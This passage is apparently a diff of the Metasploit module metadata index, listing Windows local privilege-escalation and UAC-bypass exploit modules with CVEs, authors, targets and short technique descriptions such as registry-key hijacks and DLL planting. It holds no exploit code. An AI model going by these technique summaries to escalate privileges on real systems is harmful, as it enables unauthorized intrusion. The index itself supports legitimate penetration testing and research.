"MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation", + "fullname": "exploit/windows/local/bthpan", + "aliases": [], + "rank": 200, + "disclosure_date": "2014-07-18", + "type": "exploit", + "author": [ + "Matt Bergin ", + "Jay Smith " + ], + "description": "A vulnerability within Microsoft Bluetooth Personal Area Networking module,\n BthPan.sys, can allow an attacker to inject memory controlled by the attacker\n into an arbitrary location. This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\n NtQueryIntervalProfile.", + "references": [ + "MSB-MS14-062", + "CVE-2014-4971", + "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt", + "OSVDB-109387" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bthpan.rb", + "is_install_path": true, + "ref_name": "windows/local/bthpan", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/bypassuac": { + "name": "Windows Escalate UAC Protection Bypass", + "fullname": "exploit/windows/local/bypassuac", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-12-31", + "type": "exploit", + "author": [ + "David Kennedy \"ReL1K\" ", + "mitnick", + "mubix " + ], + "description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off.", + "references": [ + "URL-http://www.trustedsec.com/december-2010/bypass-windows-uac/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/bypassuac_comhijack": { + "name": "Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)", + "fullname": "exploit/windows/local/bypassuac_comhijack", + "aliases": [], + "rank": 600, + "disclosure_date": "1900-01-01", + "type": "exploit", + "author": [ + "Matt Nelson", + "b33f", + "OJ Reeves" + ], + "description": "This module will bypass Windows UAC by creating COM handler registry entries in the\n HKCU hive. When certain high integrity processes are loaded, these registry entries\n are referenced resulting in the process loading user-controlled DLLs. These DLLs\n contain the payloads that result in elevated sessions. Registry key modifications\n are cleaned up after payload invocation.\n\n This module requires the architecture of the payload to match the OS, but the\n current low-privilege Meterpreter session architecture can be different. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.\n\n This module invokes the target binary via cmd.exe on the target. Therefore if\n cmd.exe access is restricted, this module will not run correctly.", + "references": [ + "URL-https://wikileaks.org/ciav7p1/cms/page_13763373.html", + "URL-https://github.com/FuzzySecurity/Defcon25/Defcon25_UAC-0day-All-Day_v1.2.pdf" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2024-09-04 23:49:33 +0000", + "path": "/modules/exploits/windows/local/bypassuac_comhijack.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_comhijack", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_dotnet_profiler": { + "name": "Windows Escalate UAC Protection Bypass (Via dot net profiler)", + "fullname": "exploit/windows/local/bypassuac_dotnet_profiler", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-03-17", + "type": "exploit", + "author": [ + "Casey Smith", + "\"Stefan Kanthak\" ", + "bwatters-r7" + ], + "description": "Microsoft Windows allows for the automatic loading of a profiling COM object during\n the launch of a CLR process based on certain environment variables ostensibly to\n monitor execution. In this case, we abuse the profiler by pointing to a payload DLL\n that will be launched as the profiling thread. This thread will run at the permission\n level of the calling process, so an auto-elevating process will launch the DLL with\n elevated permissions. In this case, we use gpedit.msc as the auto-elevated CLR\n process, but others would work, too.", + "references": [ + "URL-https://seclists.org/fulldisclosure/2017/Jul/11", + "URL-https://offsec.provadys.com/UAC-bypass-dotnet.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-07-21 15:34:49 +0000", + "path": "/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_dotnet_profiler", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_eventvwr": { + "name": "Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)", + "fullname": "exploit/windows/local/bypassuac_eventvwr", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-08-15", + "type": "exploit", + "author": [ + "Matt Nelson", + "Matt Graeber", + "OJ Reeves" + ], + "description": "This module will bypass Windows UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n the Windows Event Viewer is launched. It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.", + "references": [ + "URL-https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "URL-https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_eventvwr.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_eventvwr", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/bypassuac_fodhelper": { + "name": "Windows UAC Protection Bypass (Via FodHelper Registry Key)", + "fullname": "exploit/windows/local/bypassuac_fodhelper", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-05-12", + "type": "exploit", + "author": [ + "winscriptingblog", + "amaloteaux " + ], + "description": "This module will bypass Windows 10 UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.", + "references": [ + "URL-https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", + "URL-https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1", + "URL-https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2025-04-23 17:49:11 +0000", + "path": "/modules/exploits/windows/local/bypassuac_fodhelper.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_fodhelper", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/bypassuac_injection": { + "name": "Windows Escalate UAC Protection Bypass (In Memory Injection)", + "fullname": "exploit/windows/local/bypassuac_injection", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-12-31", + "type": "exploit", + "author": [ + "David Kennedy \"ReL1K\" ", + "mitnick", + "mubix ", + "Ben Campbell ", + "Lesage", + "OJ Reeves" + ], + "description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off. This module uses the Reflective DLL Injection\n technique to drop only the DLL payload binary instead of three separate\n binaries in the standard technique. However, it requires the correct\n architecture to be selected, (use x64 for SYSWOW64 systems also).\n If specifying EXE::Custom your DLL should call ExitProcess() after starting\n your payload in a separate process.", + "references": [ + "URL-http://www.trustedsec.com/december-2010/bypass-windows-uac/", + "URL-http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_injection.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_injection", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_injection_winsxs": { + "name": "Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS", + "fullname": "exploit/windows/local/bypassuac_injection_winsxs", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-04-06", + "type": "exploit", + "author": [ + "Ernesto Fernandez \"L3cr0f\" " + ], + "description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off by abusing the way \"WinSxS\" works in Windows\n systems. This module uses the Reflective DLL Injection technique to drop\n only the DLL payload binary instead of three seperate binaries in the\n standard technique. However, it requires the correct architecture to be\n selected, (use x64 for SYSWOW64 systems also).", + "references": [ + "URL-https://github.com/L3cr0f/DccwBypassUAC" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_injection_winsxs.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_injection_winsxs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_sdclt": { + "name": "Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)", + "fullname": "exploit/windows/local/bypassuac_sdclt", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-03-17", + "type": "exploit", + "author": [ + "enigma0x3", + "bwatters-r7" + ], + "description": "This module will bypass Windows UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n Window backup and restore is launched. It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.", + "references": [ + "URL-https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", + "URL-https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1", + "URL-https://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_sdclt.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_sdclt", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_silentcleanup": { + "name": "Windows Escalate UAC Protection Bypass (Via SilentCleanup)", + "fullname": "exploit/windows/local/bypassuac_silentcleanup", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-02-24", + "type": "exploit", + "author": [ + "tyranid", + "enigma0x3", + "nyshone69", + "lokiuox", + "Carter Brainerd (cbrnrd)" + ], + "description": "There's a task in Windows Task Scheduler called \"SilentCleanup\" which, while it's executed as Users, automatically runs with elevated privileges.\n When it runs, it executes the file %windir%\\system32\\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,\n %windir% (normally pointing to C:\\Windows) can be changed to point to whatever we want, and it'll run as admin.", + "references": [ + "URL-https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html", + "URL-https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/", + "URL-https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", + "URL-https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/local/bypassuac_silentcleanup.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_silentcleanup", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_sluihijack": { + "name": "Windows UAC Protection Bypass (Via Slui File Handler Hijack)", + "fullname": "exploit/windows/local/bypassuac_sluihijack", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-01-15", + "type": "exploit", + "author": [ + "bytecode-77", + "gushmazuko" + ], + "description": "This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under\n the Current User hive, and inserting a custom command that will get invoked when any binary\n (.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable\n to file handler hijacking. When we run slui.exe with changed Registry key\n (HKCU:\\Software\\Classes\\exefile\\shell\\open\\command), it will run our custom command as Admin\n instead of slui.exe.\n\n The module modifies the registry in order for this exploit to work. The modification is\n reverted once the exploitation attempt has finished.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting the\n payload in a different process.", + "references": [ + "URL-https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation", + "URL-https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_sluihijack.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_sluihijack", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/bypassuac_vbs": { + "name": "Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)", + "fullname": "exploit/windows/local/bypassuac_vbs", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-08-22", + "type": "exploit", + "author": [ + "Vozzie", + "Ben Campbell " + ], + "description": "This module will bypass Windows UAC by utilizing the missing .manifest on the script host\n cscript/wscript.exe binaries.", + "references": [ + "URL-http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html", + "URL-https://github.com/Vozzie/uacscript" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_vbs.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_vbs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_windows_store_filesys": { + "name": "Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)", + "fullname": "exploit/windows/local/bypassuac_windows_store_filesys", + "aliases": [], + "rank": 0, + "disclosure_date": "2019-08-22", + "type": "exploit", + "author": [ + "ACTIVELabs", + "sailay1996", + "timwr" + ], + "description": "This module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool\n is run with the \"autoElevate\" property set to true, however it can be moved to\n a new Windows directory containing a space (C:\\Windows \\System32\\) where, upon\n execution, it will load our payload dll (propsys.dll).", + "references": [ + "URL-https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html", + "URL-https://github.com/sailay1996/UAC_bypass_windows_store", + "URL-https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_windows_store_filesys.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_windows_store_filesys", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_windows_store_reg": { + "name": "Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry", + "fullname": "exploit/windows/local/bypassuac_windows_store_reg", + "aliases": [], + "rank": 0, + "disclosure_date": "2019-02-19", + "type": "exploit", + "author": [ + "ACTIVELabs", + "sailay1996", + "bwatters-r7" + ], + "description": "This module exploits a flaw in the WSReset.exe file associated with the Windows\n Store. This binary has autoelevate privs, and it will run a binary file\n contained in a low-privilege registry location. By placing a link to\n the binary in the registry location, WSReset.exe will launch the binary as\n a privileged user.", + "references": [ + "URL-https://www.activecyber.us/activelabs/windows-uac-bypass", + "URL-https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html", + "URL-https://github.com/sailay1996/UAC_bypass_windows_store" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_windows_store_reg.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_windows_store_reg", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/canon_driver_privesc": { + "name": "Canon Driver Privilege Escalation", + "fullname": "exploit/windows/local/canon_driver_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-08-07", + "type": "exploit", + "author": [ + "Jacob Baines", + "Shelby Pace" + ], + "description": "Canon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files\n within the \"CanonBJ\" directory and its subdirectories. By overwriting the DLL at\n C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series\\LanguageModules\\040C\\CNMurGE.dll\n with a malicious DLL at the right time whilst running the C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs\n script to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program,\n which runs as NT AUTHORITY\\SYSTEM, to successfully load the malicious DLL. Successful exploitation\n will grant attackers code execution as the NT AUTHORITY\\SYSTEM user.\n\n This module leverages the prnmngr.vbs script\n to add and delete printers. Multiple runs of this\n module may be required given successful exploitation\n is time-sensitive.", + "references": [ + "CVE-2021-38085" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/canon_driver_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/canon_driver_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "unreliable-session" + ], + "Stability": [ + "service-resource-loss" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/capcom_sys_exec": { + "name": "Windows Capcom.sys Kernel Execution Exploit (x64 only)", + "fullname": "exploit/windows/local/capcom_sys_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "TheWack0lian", + "OJ Reeves" + ], + "description": "This module abuses the Capcom.sys kernel driver's function that allows for an\n arbitrary function to be executed in the kernel from user land. This function\n purposely disables SMEP prior to invoking a function given by the caller.\n This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.\n Note that builds after 22000.194 contain deny lists that prevent this driver from loading.", + "references": [ + "URL-https://twitter.com/TheWack0lian/status/779397840762245124" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-09-08 13:05:44 +0000", + "path": "/modules/exploits/windows/local/capcom_sys_exec.rb", + "is_install_path": true, + "ref_name": "windows/local/capcom_sys_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/comahawk": { + "name": "Microsoft UPnP Local Privilege Elevation Vulnerability", + "fullname": "exploit/windows/local/comahawk", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-11-12", + "type": "exploit", + "author": [ + "NCC Group", + "hoangprod", + "bwatters-r7" + ], + "description": "This exploit uses two vulnerabilities to execute a command as an elevated user.\n The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to\n NT AUTHORITY\\LOCAL SERVICE\n The second (CVE-2019-1322) leverages the Update Orchestrator Service to\n elevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM.", + "references": [ + "CVE-2019-1322", + "CVE-2019-1405", + "EDB-47684", + "URL-https://github.com/apt69/COMahawk", + "URL-https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/", + "URL-https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/comahawk.rb", + "is_install_path": true, + "ref_name": "windows/local/comahawk", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/current_user_psexec": { + "name": "PsExec via Current User Token", + "fullname": "exploit/windows/local/current_user_psexec", + "aliases": [], + "rank": 600, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "egypt ", + "jabra" + ], + "description": "This module uploads an executable file to the victim system, creates\n a share containing that executable, creates a remote service on each\n target system using a UNC path to that file, and finally starts the\n service(s).\n\n The result is similar to psexec but with the added benefit of using\n the session's current authentication token instead of having to know\n a password or hash.", + "references": [ + "CVE-1999-0504", + "OSVDB-3106", + "URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/local/current_user_psexec.rb", + "is_install_path": true, + "ref_name": "windows/local/current_user_psexec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2017_8464_lnk_lpe": { + "name": "LNK Code Execution Vulnerability", + "fullname": "exploit/windows/local/cve_2017_8464_lnk_lpe", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-06-13", + "type": "exploit", + "author": [ + "Uncredited", + "Yorick Koster", + "Spencer McIntyre" + ], + "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n The PATH option must be an absolute path to a writeable directory which is indexed for\n searching. If no PATH is specified, the module defaults to %USERPROFILE%.", + "references": [ + "CVE-2017-8464", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464", + "URL-http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt", + "URL-https://msdn.microsoft.com/en-us/library/dd871305.aspx", + "URL-http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm", + "URL-https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64", + "Windows x86" + ], + "mod_time": "2023-03-13 10:31:27 +0000", + "path": "/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2017_8464_lnk_lpe", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-restarts" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/cve_2018_8453_win32k_priv_esc": { + "name": "Windows NtUserSetWindowFNID Win32k User Callback", + "fullname": "exploit/windows/local/cve_2018_8453_win32k_priv_esc", + "aliases": [], + "rank": 0, + "disclosure_date": "2018-10-09", + "type": "exploit", + "author": [ + "ze0r", + "Kaspersky Lab", + "Jacob Robles" + ], + "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component\n fails to properly handle objects in memory, aka \"Win32k Elevation of Privilege Vulnerability.\"\n This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows\n Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2,\n Windows 10, Windows 10 Servers.\n This module is tested against Windows 10 v1703 x86.", + "references": [ + "CVE-2018-8453", + "URL-https://github.com/ze0r/cve-2018-8453-exp", + "URL-https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig", + "URL-https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ", + "URL-https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10 v1703 (Build 15063) x86" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2018_8453_win32k_priv_esc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ], + "Stability": [ + "crash-os-restarts" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/cve_2019_1458_wizardopium": { + "name": "Microsoft Windows Uninitialized Variable Local Privilege Elevation", + "fullname": "exploit/windows/local/cve_2019_1458_wizardopium", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-12-10", + "type": "exploit", + "author": [ + "piotrflorczyk", + "unamer", + "timwr" + ], + "description": "This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability\n within win32k which occurs due to an uninitalized variable, which allows user mode attackers\n to write a limited amount of controlled data to an attacker controlled address\n in kernel memory. By utilizing this vulnerability to execute controlled writes\n to kernel memory, an attacker can gain arbitrary code execution\n as the SYSTEM user.\n\n This module has been tested against Windows 7 x64 SP1. Offsets within the\n exploit code may need to be adjusted to work with other versions of Windows.\n The exploit can only be triggered once against the target and can cause the\n target machine to reboot when the session is terminated.", + "references": [ + "CVE-2019-1458", + "URL-https://github.com/unamer/CVE-2019-1458", + "URL-https://github.com/piotrflorczyk/cve-2019-1458_POC", + "URL-https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/", + "URL-https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2019_1458_wizardopium.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2019_1458_wizardopium", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + 